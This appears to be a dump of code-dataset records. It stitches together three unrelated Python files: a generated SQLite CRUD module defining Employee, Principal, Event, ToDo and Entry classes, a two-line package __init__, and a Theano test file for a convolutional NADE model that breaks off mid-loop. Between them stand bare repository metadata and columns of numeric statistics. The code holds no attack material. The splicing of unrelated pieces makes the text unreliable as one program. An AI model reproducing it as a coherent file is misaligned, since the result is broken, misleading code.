[ "MIT" ]
8
2018-03-10T05:33:58.000Z
2019-01-25T08:32:27.000Z
SqltDAO/CrudMeister.py
soft9000/PyDAO
1316bdf34b62187b7763c2c7dd0036837cdcc894
[ "MIT" ]
null
null
null
SqltDAO/CrudMeister.py
soft9000/PyDAO
1316bdf34b62187b7763c2c7dd0036837cdcc894
[ "MIT" ]
6
2018-10-15T17:07:28.000Z
2019-02-03T21:49:54.000Z
#!/usr/bin/env python3
'''
Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha)
Generated @ Thu Jan 17 04:49:38 2019
'''
import sqlite3

class Employee:

    def __init__(self):
        self.db = './~CrudMeister.sqlt3'
        self.conn = None
        self.curs = None
        self.bOpen = False
        self.fields = [('Name', 'Text'), ('Email1', 'Text'), ('Email2', 'Text'), ('Email3', 'Text'), ('Phone1', 'Text'), ('Phone2', 'Text'), ('Phone3', 'Text'), ('Notes', 'Text')]
        self.table_name = 'Employee'

    def open(self):
        if self.bOpen is False:
            self.conn = sqlite3.connect(self.db)
            self.curs = self.conn.cursor()
            self.bOpen = True
        return True

    def close(self):
        if self.bOpen:
            self.conn.commit()
            self.bOpen = False
        return True

    def count(self):
        if self.bOpen:
            res = self.curs.execute("SELECT count(*) FROM Employee;")
            return res.fetchone()[0]
        return -1

    def drop_table(self):
        if self.bOpen:
            self.curs.execute("DrOp TaBLe IF EXISTS Employee;")
            return True
        return False

    def create_table(self):
        if self.bOpen:
            self.curs.execute("CREATE TABLE IF NOT EXISTS Employee(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Email1 Text, Email2 Text, Email3 Text, Phone1 Text, Phone2 Text, Phone3 Text, Notes Text);")
            return True
        return False

    def insert(self, fields):
        if self.bOpen:
            self.curs.execute("INSERT INTO Employee ( Name, Email1, Email2, Email3, Phone1, Phone2, Phone3, Notes) VALUES (?,?,?,?,?,?,?,?);", fields)
            return True
        return False

    def delete(self, primary_key):
        if self.bOpen:
            self.curs.execute("DELETE from Employee WHERE ID = ?;", [primary_key])
            return True
        return False

    def select(self, sql_select):
        if self.bOpen:
            self.curs.execute(sql_select)
            zlist = self.curs.fetchall()
            for ref in zlist:
                yield ref
        return None

    @staticmethod
    def Import(dao, encoding=None, text_file='Employee.csv', hasHeader=True, sep='|'):
        try:
            # dao.open()
            with open(text_file, encoding=encoding) as fh:
                line = fh.readline().strip()
                if hasHeader is True:
                    line = fh.readline().strip()
                while len(line):
                    if dao.insert(line.split(sep)) is False:
                        return False
                    line = fh.readline().strip()
            # dao.close()
            return True
        except:
            pass
        return False

#!/usr/bin/env python3
'''
Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha)
Generated @ Thu Jan 17 04:49:38 2019
'''
import sqlite3

class Principal:

    def __init__(self):
        self.db = './~CrudMeister.sqlt3'
        self.conn = None
        self.curs = None
        self.bOpen = False
        self.fields = [('Name', 'Text'), ('Email1', 'Text'), ('Email2', 'Text'), ('Email3', 'Text'), ('Phone1', 'Text'), ('Phone2', 'Text'), ('Phone3', 'Text'), ('Notes', 'Text')]
        self.table_name = 'Principal'

    def open(self):
        if self.bOpen is False:
            self.conn = sqlite3.connect(self.db)
            self.curs = self.conn.cursor()
            self.bOpen = True
        return True

    def close(self):
        if self.bOpen:
            self.conn.commit()
            self.bOpen = False
        return True

    def count(self):
        if self.bOpen:
            res = self.curs.execute("SELECT count(*) FROM Principal;")
            return res.fetchone()[0]
        return -1

    def drop_table(self):
        if self.bOpen:
            self.curs.execute("DrOp TaBLe IF EXISTS Principal;")
            return True
        return False

    def create_table(self):
        if self.bOpen:
            self.curs.execute("CREATE TABLE IF NOT EXISTS Principal(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Email1 Text, Email2 Text, Email3 Text, Phone1 Text, Phone2 Text, Phone3 Text, Notes Text);")
            return True
        return False

    def insert(self, fields):
        if self.bOpen:
            self.curs.execute("INSERT INTO Principal ( Name, Email1, Email2, Email3, Phone1, Phone2, Phone3, Notes) VALUES (?,?,?,?,?,?,?,?);", fields)
            return True
        return False

    def delete(self, primary_key):
        if self.bOpen:
            self.curs.execute("DELETE from Principal WHERE ID = ?;", [primary_key])
            return True
        return False

    def select(self, sql_select):
        if self.bOpen:
            self.curs.execute(sql_select)
            zlist = self.curs.fetchall()
            for ref in zlist:
                yield ref
        return None

    @staticmethod
    def Import(dao, encoding=None, text_file='Principal.csv', hasHeader=True, sep='|'):
        try:
            # dao.open()
            with open(text_file, encoding=encoding) as fh:
                line = fh.readline().strip()
                if hasHeader is True:
                    line = fh.readline().strip()
                while len(line):
                    if dao.insert(line.split(sep)) is False:
                        return False
                    line = fh.readline().strip()
            # dao.close()
            return True
        except:
            pass
        return False

#!/usr/bin/env python3
'''
Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha)
Generated @ Thu Jan 17 04:49:38 2019
'''
import sqlite3

class Event:

    def __init__(self):
        self.db = './~CrudMeister.sqlt3'
        self.conn = None
        self.curs = None
        self.bOpen = False
        self.fields = [('Name', 'Text'), ('Start', 'Text'), ('Stop', 'Text')]
        self.table_name = 'Event'

    def open(self):
        if self.bOpen is False:
            self.conn = sqlite3.connect(self.db)
            self.curs = self.conn.cursor()
            self.bOpen = True
        return True

    def close(self):
        if self.bOpen:
            self.conn.commit()
            self.bOpen = False
        return True

    def count(self):
        if self.bOpen:
            res = self.curs.execute("SELECT count(*) FROM Event;")
            return res.fetchone()[0]
        return -1

    def drop_table(self):
        if self.bOpen:
            self.curs.execute("DrOp TaBLe IF EXISTS Event;")
            return True
        return False

    def create_table(self):
        if self.bOpen:
            self.curs.execute("CREATE TABLE IF NOT EXISTS Event(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Start Text, Stop Text);")
            return True
        return False

    def insert(self, fields):
        if self.bOpen:
            self.curs.execute("INSERT INTO Event ( Name, Start, Stop) VALUES (?,?,?);", fields)
            return True
        return False

    def delete(self, primary_key):
        if self.bOpen:
            self.curs.execute("DELETE from Event WHERE ID = ?;", [primary_key])
            return True
        return False

    def select(self, sql_select):
        if self.bOpen:
            self.curs.execute(sql_select)
            zlist = self.curs.fetchall()
            for ref in zlist:
                yield ref
        return None

    @staticmethod
    def Import(dao, encoding=None, text_file='Event.csv', hasHeader=True, sep='|'):
        try:
            # dao.open()
            with open(text_file, encoding=encoding) as fh:
                line = fh.readline().strip()
                if hasHeader is True:
                    line = fh.readline().strip()
                while len(line):
                    if dao.insert(line.split(sep)) is False:
                        return False
                    line = fh.readline().strip()
            # dao.close()
            return True
        except:
            pass
        return False

#!/usr/bin/env python3
'''
Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha)
Generated @ Thu Jan 17 04:49:38 2019
'''
import sqlite3

class ToDo:

    def __init__(self):
        self.db = './~CrudMeister.sqlt3'
        self.conn = None
        self.curs = None
        self.bOpen = False
        self.fields = [('Name', 'Text'), ('Description', 'Text')]
        self.table_name = 'ToDo'

    def open(self):
        if self.bOpen is False:
            self.conn = sqlite3.connect(self.db)
            self.curs = self.conn.cursor()
            self.bOpen = True
        return True

    def close(self):
        if self.bOpen:
            self.conn.commit()
            self.bOpen = False
        return True

    def count(self):
        if self.bOpen:
            res = self.curs.execute("SELECT count(*) FROM ToDo;")
            return res.fetchone()[0]
        return -1

    def drop_table(self):
        if self.bOpen:
            self.curs.execute("DrOp TaBLe IF EXISTS ToDo;")
            return True
        return False

    def create_table(self):
        if self.bOpen:
            self.curs.execute("CREATE TABLE IF NOT EXISTS ToDo(ID INTEGER PRIMARY KEY AUTOINCREMENT, Name Text, Description Text);")
            return True
        return False

    def insert(self, fields):
        if self.bOpen:
            self.curs.execute("INSERT INTO ToDo ( Name, Description) VALUES (?,?);", fields)
            return True
        return False

    def delete(self, primary_key):
        if self.bOpen:
            self.curs.execute("DELETE from ToDo WHERE ID = ?;", [primary_key])
            return True
        return False

    def select(self, sql_select):
        if self.bOpen:
            self.curs.execute(sql_select)
            zlist = self.curs.fetchall()
            for ref in zlist:
                yield ref
        return None

    @staticmethod
    def Import(dao, encoding=None, text_file='ToDo.csv', hasHeader=True, sep='|'):
        try:
            # dao.open()
            with open(text_file, encoding=encoding) as fh:
                line = fh.readline().strip()
                if hasHeader is True:
                    line = fh.readline().strip()
                while len(line):
                    if dao.insert(line.split(sep)) is False:
                        return False
                    line = fh.readline().strip()
            # dao.close()
            return True
        except:
            pass
        return False

#!/usr/bin/env python3
'''
Generated by Soft9000/PyDAO, Ver. 1.0 (Alpha)
Generated @ Thu Jan 17 04:49:38 2019
'''
import sqlite3

class Entry:

    def __init__(self):
        self.db = './~CrudMeister.sqlt3'
        self.conn = None
        self.curs = None
        self.bOpen = False
        self.fields = [('DateTime', 'Text'), ('ObjectName', 'Text'), ('ObjectId', 'Integer'), ('Description', 'Text')]
        self.table_name = 'Entry'

    def open(self):
        if self.bOpen is False:
            self.conn = sqlite3.connect(self.db)
            self.curs = self.conn.cursor()
            self.bOpen = True
        return True

    def close(self):
        if self.bOpen:
            self.conn.commit()
            self.bOpen = False
        return True

    def count(self):
        if self.bOpen:
            res = self.curs.execute("SELECT count(*) FROM Entry;")
            return res.fetchone()[0]
        return -1

    def drop_table(self):
        if self.bOpen:
            self.curs.execute("DrOp TaBLe IF EXISTS Entry;")
            return True
        return False

    def create_table(self):
        if self.bOpen:
            self.curs.execute("CREATE TABLE IF NOT EXISTS Entry(ID INTEGER PRIMARY KEY AUTOINCREMENT, DateTime Text, ObjectName Text, ObjectId Integer, Description Text);")
            return True
        return False

    def insert(self, fields):
        if self.bOpen:
            self.curs.execute("INSERT INTO Entry ( DateTime, ObjectName, ObjectId, Description) VALUES (?,?,?,?);", fields)
            return True
        return False

    def delete(self, primary_key):
        if self.bOpen:
            self.curs.execute("DELETE from Entry WHERE ID = ?;", [primary_key])
            return True
        return False

    def select(self, sql_select):
        if self.bOpen:
            self.curs.execute(sql_select)
            zlist = self.curs.fetchall()
            for ref in zlist:
                yield ref
        return None

    @staticmethod
    def Import(dao, encoding=None, text_file='Entry.csv', hasHeader=True, sep='|'):
        try:
            # dao.open()
            with open(text_file, encoding=encoding) as fh:
                line = fh.readline().strip()
                if hasHeader is True:
                    line = fh.readline().strip()
                while len(line):
                    if dao.insert(line.split(sep)) is False:
                        return False
                    line = fh.readline().strip()
            # dao.close()
            return True
        except:
            pass
        return False
30.98441
210
0.502372
1,500
13,912
4.616
0.073333
0.07149
0.063547
0.064991
0.956095
0.945552
0.941219
0.929665
0.915656
0.915656
0
0.018398
0.390526
13,912
448
211
31.053571
0.798207
0.02178
0
0.871642
1
0.01791
0.155568
0
0
0
0
0
0
1
0.149254
false
0.014925
0.029851
0
0.432836
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
2f8688f3a968d5645cc87722a2e3f0ae5ba5c4a4
119
py
Python
snake_rl/algorithms/common/__init__.py
alex-petrenko/snake-rl
ca7000120985da7fcac4047747ad7937693abcfe
[ "MIT" ]
1
2021-08-28T10:37:33.000Z
2021-08-28T10:37:33.000Z
snake_rl/algorithms/common/__init__.py
dre2004/snake-rl
ca7000120985da7fcac4047747ad7937693abcfe
[ "MIT" ]
null
null
null
snake_rl/algorithms/common/__init__.py
dre2004/snake-rl
ca7000120985da7fcac4047747ad7937693abcfe
[ "MIT" ]
1
2021-02-18T00:22:40.000Z
2021-02-18T00:22:40.000Z
from snake_rl.algorithms.common.agent import AgentLearner
from snake_rl.algorithms.common.loops import run_policy_loop
39.666667
60
0.882353
18
119
5.611111
0.666667
0.178218
0.217822
0.415842
0.534653
0
0
0
0
0
0
0
0.067227
119
2
61
59.5
0.90991
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
2f9a7447e86252897b9bc7d64d40b608f792a308
30,187
py
Python
convnade/tests/test_convnade.py
vlimant/NADE
e2446c73250a99979c8710a8acbb14823a54bce0
[ "BSD-3-Clause" ]
43
2017-06-19T21:19:55.000Z
2022-02-06T01:21:48.000Z
convnade/tests/test_convnade.py
vlimant/NADE
e2446c73250a99979c8710a8acbb14823a54bce0
[ "BSD-3-Clause" ]
1
2017-08-29T14:09:49.000Z
2017-09-08T12:34:19.000Z
convnade/tests/test_convnade.py
vlimant/NADE
e2446c73250a99979c8710a8acbb14823a54bce0
[ "BSD-3-Clause" ]
12
2017-09-12T07:56:13.000Z
2021-09-19T19:11:41.000Z
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys

# Hack so you don't have to put the library containing this script in the PYTHONPATH.
sys.path = [os.path.abspath(os.path.join(__file__, '..', '..'))] + sys.path

import theano
import theano.tensor as T
import numpy as np
import tempfile

from numpy.testing import assert_equal, assert_almost_equal, assert_array_equal, assert_array_almost_equal

import smartlearner.initializers as initer
from smartlearner import Trainer, Dataset, Model
from smartlearner import tasks
from smartlearner import views
from smartlearner import stopping_criteria
from smartlearner.utils import sharedX
from smartlearner.optimizers import SGD
from smartlearner.direction_modifiers import ConstantLearningRate
#from smartlearner.batch_schedulers import MiniBatchScheduler, FullBatchScheduler
#from smartlearner.losses.classification_losses import NegativeLogLikelihood as NLL
#from smartlearner.losses.classification_losses import ClassificationError

from convnade.utils import Timer, cartesian
from convnade.datasets import load_binarized_mnist
from convnade import DeepConvNADE, DeepConvNADEBuilder
from convnade import generate_blueprints
#from convnade.tasks import DeepNadeOrderingTask
from convnade.batch_schedulers import MiniBatchSchedulerWithAutoregressiveMask
from convnade.losses import BinaryCrossEntropyEstimateWithAutoRegressiveMask

np.set_printoptions(linewidth=220)


def test_simple_convnade():
    nb_kernels = 8
    kernel_shape = (2, 2)
    hidden_activation = "sigmoid"
    use_mask_as_input = True
    batch_size = 1024
    ordering_seed = 1234
    max_epoch = 3
    nb_orderings = 1

    print("Will train Convolutional Deep NADE for a total of {0} epochs.".format(max_epoch))

    with Timer("Loading/processing binarized MNIST"):
        trainset, validset, testset = load_binarized_mnist()

        # Extract the center patch (4x4 pixels) of each image.
        indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435]
        trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep],
                           trainset.inputs.get_value()[:, indices_to_keep], name="trainset")
        validset = Dataset(validset.inputs.get_value()[:, indices_to_keep],
                           validset.inputs.get_value()[:, indices_to_keep], name="validset")
        testset = Dataset(testset.inputs.get_value()[:, indices_to_keep],
                          testset.inputs.get_value()[:, indices_to_keep], name="testset")

        image_shape = (4, 4)
        nb_channels = 1

    with Timer("Building model"):
        builder = DeepConvNADEBuilder(image_shape=image_shape,
                                      nb_channels=nb_channels,
                                      use_mask_as_input=use_mask_as_input)

        convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)"
        fullnet_blueprint = "5 -> 16"
        print("Convnet:", convnet_blueprint)
        print("Fullnet:", fullnet_blueprint)
        builder.build_convnet_from_blueprint(convnet_blueprint)
        builder.build_fullnet_from_blueprint(fullnet_blueprint)

        model = builder.build()
        model.initialize()  # By default, uniform initialization.

    with Timer("Building optimizer"):
        loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset)
        optimizer = SGD(loss=loss)
        optimizer.append_direction_modifier(ConstantLearningRate(0.001))

    with Timer("Building trainer"):
        batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size)
        trainer = Trainer(optimizer, batch_scheduler)

        trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch))

        # Print time for one epoch
        trainer.append_task(tasks.PrintEpochDuration())
        trainer.append_task(tasks.PrintTrainingDuration())

        # Log training error
        loss_monitor = views.MonitorVariable(loss.loss)
        avg_loss = tasks.AveragePerEpoch(loss_monitor)
        accum = tasks.Accumulator(loss_monitor)
        logger = tasks.Logger(loss_monitor, avg_loss)
        trainer.append_task(logger, avg_loss, accum)

        # Print average training loss.
        trainer.append_task(tasks.Print("Avg. training loss: {}", avg_loss))

        # Print NLL mean/stderror.
        nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset),
                             batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset, batch_size=len(validset)))
        trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror))

        trainer.build_theano_graph()

    with Timer("Training"):
        trainer.train()

    with Timer("Checking the probs for all possible inputs sum to 1"):
        rng = np.random.RandomState(ordering_seed)
        D = np.prod(image_shape)
        inputs = cartesian([[0, 1]]*int(D), dtype=np.float32)
        ordering = np.arange(D, dtype=np.int32)
        rng.shuffle(ordering)

        symb_input = T.vector("input")
        symb_input.tag.test_value = inputs[-len(inputs)//4]
        symb_ordering = T.ivector("ordering")
        symb_ordering.tag.test_value = ordering
        nll_of_x_given_o = theano.function([symb_input, symb_ordering],
                                           model.nll_of_x_given_o(symb_input, symb_ordering),
                                           name="nll_of_x_given_o")
        #theano.printing.pydotprint(nll_of_x_given_o, '{0}_nll_of_x_given_o_{1}'.format(model.__class__.__name__, theano.config.device), with_ids=True)

        for i in range(nb_orderings):
            print("Ordering:", ordering)
            ordering = np.arange(D, dtype=np.int32)
            rng.shuffle(ordering)

            nlls = []
            for no, input in enumerate(inputs):
                print("{}/{}".format(no, len(inputs)), end='\r')
                nlls.append(nll_of_x_given_o(input, ordering))

            print("{}/{} Done".format(len(inputs), len(inputs)))
            p_x = np.exp(np.logaddexp.reduce(-np.array(nlls)))
            print("Sum of p(x) for all x:", p_x)
            assert_almost_equal(p_x, 1., decimal=5)


def test_convnade_with_max_pooling():
    nb_kernels = 8
    kernel_shape = (2, 2)
    hidden_activation = "sigmoid"
    use_mask_as_input = True
    batch_size = 1024
    ordering_seed = 1234
    max_epoch = 3
    nb_orderings = 1

    print("Will train Convolutional Deep NADE for a total of {0} epochs.".format(max_epoch))

    with Timer("Loading/processing binarized MNIST"):
        trainset, validset, testset = load_binarized_mnist()

        # Extract the center patch (4x4 pixels) of each image.
        indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435]
        trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep],
                           trainset.inputs.get_value()[:, indices_to_keep], name="trainset")
        validset = Dataset(validset.inputs.get_value()[:, indices_to_keep],
                           validset.inputs.get_value()[:, indices_to_keep], name="validset")
        testset = Dataset(testset.inputs.get_value()[:, indices_to_keep],
                          testset.inputs.get_value()[:, indices_to_keep], name="testset")

        image_shape = (4, 4)
        nb_channels = 1

    with Timer("Building model"):
        builder = DeepConvNADEBuilder(image_shape=image_shape,
                                      nb_channels=nb_channels,
                                      use_mask_as_input=use_mask_as_input)

        convnet_blueprint = "64@3x3(valid) -> max@2x2 -> up@2x2 -> 1@3x3(full)"
        fullnet_blueprint = "5 -> 16"
        print("Convnet:", convnet_blueprint)
        print("Fullnet:", fullnet_blueprint)
        builder.build_convnet_from_blueprint(convnet_blueprint)
        builder.build_fullnet_from_blueprint(fullnet_blueprint)

        model = builder.build()
        model.initialize()  # By default, uniform initialization.

    with Timer("Building optimizer"):
        loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset)
        optimizer = SGD(loss=loss)
        optimizer.append_direction_modifier(ConstantLearningRate(0.001))

    with Timer("Building trainer"):
        batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size)
        trainer = Trainer(optimizer, batch_scheduler)

        trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch))

        # Print time for one epoch
        trainer.append_task(tasks.PrintEpochDuration())
        trainer.append_task(tasks.PrintTrainingDuration())

        # Log training error
        loss_monitor = views.MonitorVariable(loss.loss)
        avg_loss = tasks.AveragePerEpoch(loss_monitor)
        accum = tasks.Accumulator(loss_monitor)
        logger = tasks.Logger(loss_monitor, avg_loss)
        trainer.append_task(logger, avg_loss, accum)

        # Print average training loss.
        trainer.append_task(tasks.Print("Avg. training loss: {}", avg_loss))

        # Print NLL mean/stderror.
        nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset),
                             batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset, batch_size=len(validset)))
        trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror))

        trainer.build_theano_graph()

    with Timer("Training"):
        trainer.train()

    with Timer("Checking the probs for all possible inputs sum to 1"):
        rng = np.random.RandomState(ordering_seed)
        D = np.prod(image_shape)
        inputs = cartesian([[0, 1]]*int(D), dtype=np.float32)
        ordering = np.arange(D, dtype=np.int32)
        rng.shuffle(ordering)

        symb_input = T.vector("input")
        symb_input.tag.test_value = inputs[-len(inputs)//4]
        symb_ordering = T.ivector("ordering")
        symb_ordering.tag.test_value = ordering
        nll_of_x_given_o = theano.function([symb_input, symb_ordering],
                                           model.nll_of_x_given_o(symb_input, symb_ordering),
                                           name="nll_of_x_given_o")
        #theano.printing.pydotprint(nll_of_x_given_o, '{0}_nll_of_x_given_o_{1}'.format(model.__class__.__name__, theano.config.device), with_ids=True)

        for i in range(nb_orderings):
            print("Ordering:", ordering)
            ordering = np.arange(D, dtype=np.int32)
            rng.shuffle(ordering)

            nlls = []
            for no, input in enumerate(inputs):
                print("{}/{}".format(no, len(inputs)), end='\r')
                nlls.append(nll_of_x_given_o(input, ordering))

            print("{}/{} Done".format(len(inputs), len(inputs)))
            p_x = np.exp(np.logaddexp.reduce(-np.array(nlls)))
            print("Sum of p(x) for all x:", p_x)
            assert_almost_equal(p_x, 1., decimal=5)


def test_convnade_with_mask_as_input_channel():
    nb_kernels = 8
    kernel_shape = (2, 2)
    hidden_activation = "sigmoid"
    use_mask_as_input = True
    batch_size = 1024
    ordering_seed = 1234
    max_epoch = 3
    nb_orderings = 1

    print("Will train Convolutional Deep NADE for a total of {0} epochs.".format(max_epoch))

    with Timer("Loading/processing binarized MNIST"):
        trainset, validset, testset = load_binarized_mnist()

        # Extract the center patch (4x4 pixels) of each image.
        indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435]
        trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep],
                           trainset.inputs.get_value()[:, indices_to_keep], name="trainset")
        validset = Dataset(validset.inputs.get_value()[:, indices_to_keep],
                           validset.inputs.get_value()[:, indices_to_keep], name="validset")
        testset = Dataset(testset.inputs.get_value()[:, indices_to_keep],
                          testset.inputs.get_value()[:, indices_to_keep], name="testset")

        image_shape = (4, 4)

        # We consider the mask as an input channel so we do the necessary modification to the datasets.
        nb_channels = 1 + (use_mask_as_input is True)
        batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size,
                                                                   use_mask_as_input=use_mask_as_input)

    with Timer("Building model"):
        builder = DeepConvNADEBuilder(image_shape=image_shape, nb_channels=nb_channels)

        convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)"
        fullnet_blueprint = "5 -> 16"
        print("Convnet:", convnet_blueprint)
        print("Fullnet:", fullnet_blueprint)
        builder.build_convnet_from_blueprint(convnet_blueprint)
        builder.build_fullnet_from_blueprint(fullnet_blueprint)

        model = builder.build()
        model.initialize()  # By default, uniform initialization.

    with Timer("Building optimizer"):
        loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset)
        optimizer = SGD(loss=loss)
        optimizer.append_direction_modifier(ConstantLearningRate(0.001))

    with Timer("Building trainer"):
        trainer = Trainer(optimizer, batch_scheduler)

        trainer.append_task(stopping_criteria.MaxEpochStopping(max_epoch))

        # Print time for one epoch
        trainer.append_task(tasks.PrintEpochDuration())
        trainer.append_task(tasks.PrintTrainingDuration())

        # Log training error
        loss_monitor = views.MonitorVariable(loss.loss)
        avg_loss = tasks.AveragePerEpoch(loss_monitor)
        accum = tasks.Accumulator(loss_monitor)
        logger = tasks.Logger(loss_monitor, avg_loss)
        trainer.append_task(logger, avg_loss, accum)

        # Print average training loss.
        trainer.append_task(tasks.Print("Avg. training loss: {}", avg_loss))

        # Print NLL mean/stderror.
        nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset),
                             batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset,
                                                                                      batch_size=len(validset),
                                                                                      use_mask_as_input=use_mask_as_input))
        trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror))

        trainer.build_theano_graph()

    with Timer("Training"):
        trainer.train()

    with Timer("Checking the probs for all possible inputs sum to 1"):
        rng = np.random.RandomState(ordering_seed)
        D = np.prod(image_shape)
        inputs = cartesian([[0, 1]]*int(D), dtype=np.float32)
        ordering = np.arange(D, dtype=np.int32)
        rng.shuffle(ordering)

        d = rng.randint(D, size=(D, 1))
        masks_o_lt_d = np.arange(D) < d
        # Inplace shuffling of each row. (Fixed: the original used `map`,
        # which is lazy in Python 3 and never actually ran.)
        for row in masks_o_lt_d:
            rng.shuffle(row)

        symb_input = T.vector("input")
        symb_input.tag.test_value = inputs[-len(inputs)//4]
        symb_ordering = T.ivector("ordering")
        symb_ordering.tag.test_value = ordering
        nll_of_x_given_o = theano.function([symb_input, symb_ordering],
                                           model.nll_of_x_given_o(symb_input, symb_ordering),
                                           name="nll_of_x_given_o")
        #theano.printing.pydotprint(nll_of_x_given_o, '{0}_nll_of_x_given_o_{1}'.format(model.__class__.__name__, theano.config.device), with_ids=True)

        for i in range(nb_orderings):
            print("Ordering:", ordering)
            ordering = np.arange(D, dtype=np.int32)
            rng.shuffle(ordering)

            nlls = []
            for no, input in enumerate(inputs):
                print("{}/{}".format(no, len(inputs)), end='\r')
                nlls.append(nll_of_x_given_o(input, ordering))

            print("{}/{} Done".format(len(inputs), len(inputs)))
            p_x = np.exp(np.logaddexp.reduce(-np.array(nlls)))
            print("Sum of p(x) for all x:", p_x)
            assert_almost_equal(p_x, 1., decimal=5)


def test_check_init():
    nb_kernels = 8
    kernel_shape = (2, 2)
    hidden_activation = "hinge"
    use_mask_as_input = True
    batch_size = 1024
    ordering_seed = 1234
    max_epoch = 5
    nb_orderings = 1

    with Timer("Loading/processing binarized MNIST"):
        trainset, validset, testset = load_binarized_mnist()

        # Extract the center patch (4x4 pixels) of each image.
        indices_to_keep = [348, 349, 350, 351, 376, 377, 378, 379, 404, 405, 406, 407, 432, 433, 434, 435]
        trainset = Dataset(trainset.inputs.get_value()[:, indices_to_keep],
                           trainset.inputs.get_value()[:, indices_to_keep], name="trainset")
        validset = Dataset(validset.inputs.get_value()[:, indices_to_keep],
                           validset.inputs.get_value()[:, indices_to_keep], name="validset")
        testset = Dataset(testset.inputs.get_value()[:, indices_to_keep],
                          testset.inputs.get_value()[:, indices_to_keep], name="testset")

        image_shape = (4, 4)
        nb_channels = 1

    # Nested function to build a trainer.
    def _build_trainer(nb_epochs):
        print("Will train Convolutional Deep NADE for a total of {0} epochs.".format(nb_epochs))

        with Timer("Building model"):
            builder = DeepConvNADEBuilder(image_shape=image_shape,
                                          nb_channels=nb_channels,
                                          use_mask_as_input=use_mask_as_input)

            convnet_blueprint = "64@2x2(valid) -> 1@2x2(full)"
            fullnet_blueprint = "5 -> 16"
            print("Convnet:", convnet_blueprint)
            print("Fullnet:", fullnet_blueprint)
            builder.build_convnet_from_blueprint(convnet_blueprint)
            builder.build_fullnet_from_blueprint(fullnet_blueprint)

            model = builder.build()
            model.initialize(initer.UniformInitializer(random_seed=1234))

        with Timer("Building optimizer"):
            loss = BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, trainset)
            optimizer = SGD(loss=loss)
            optimizer.append_direction_modifier(ConstantLearningRate(0.001))

        with Timer("Building trainer"):
            batch_scheduler = MiniBatchSchedulerWithAutoregressiveMask(trainset, batch_size)
            trainer = Trainer(optimizer, batch_scheduler)

            # Print time for one epoch
            trainer.append_task(tasks.PrintEpochDuration())
            trainer.append_task(tasks.PrintTrainingDuration())

            # Log training error
            loss_monitor = views.MonitorVariable(loss.loss)
            avg_loss = tasks.AveragePerEpoch(loss_monitor)
            accum = tasks.Accumulator(loss_monitor)
            logger = tasks.Logger(loss_monitor, avg_loss)
            trainer.append_task(logger, avg_loss, accum)

            # Print average training loss.
            trainer.append_task(tasks.Print("Avg. training loss: {}", avg_loss))

            # Print NLL mean/stderror.
            nll = views.LossView(loss=BinaryCrossEntropyEstimateWithAutoRegressiveMask(model, validset),
                                 batch_scheduler=MiniBatchSchedulerWithAutoregressiveMask(validset,
                                                                                          batch_size=len(validset),
                                                                                          keep_mask=True))
            trainer.append_task(tasks.Print("Validset - NLL : {0:.2f} ± {1:.2f}", nll.mean, nll.stderror))

            trainer.append_task(stopping_criteria.MaxEpochStopping(nb_epochs))

        return trainer, nll

    trainer1, nll1 = _build_trainer(nb_epochs=5)
    with Timer("Compiling training graph"):
        trainer1.build_theano_graph()

    with Timer("Compiling training graph"):
        trainer2, nll2 = _build_trainer(nb_epochs=5)

    # Check the two models have been initialized the same way.
    assert_equal(len(trainer1._optimizer.loss.model.parameters),
                 len(trainer2._optimizer.loss.model.parameters))
    for param1, param2 in zip(trainer1._optimizer.loss.model.parameters,
                              trainer2._optimizer.loss.model.parameters):
        assert_array_equal(param1.get_value(), param2.get_value(), err_msg=param1.name)

    with Timer("Training"):
        trainer1.train()
        trainer2.train()

    # Check the two models are the same after training for 5 epochs.
    assert_equal(len(trainer1._optimizer.loss.model.parameters),
                 len(trainer2._optimizer.loss.model.parameters))
    for param1, param2 in zip(trainer1._optimizer.loss.model.parameters,
                              trainer2._optimizer.loss.model.parameters):
        # I tested it, they are equal when using float64.
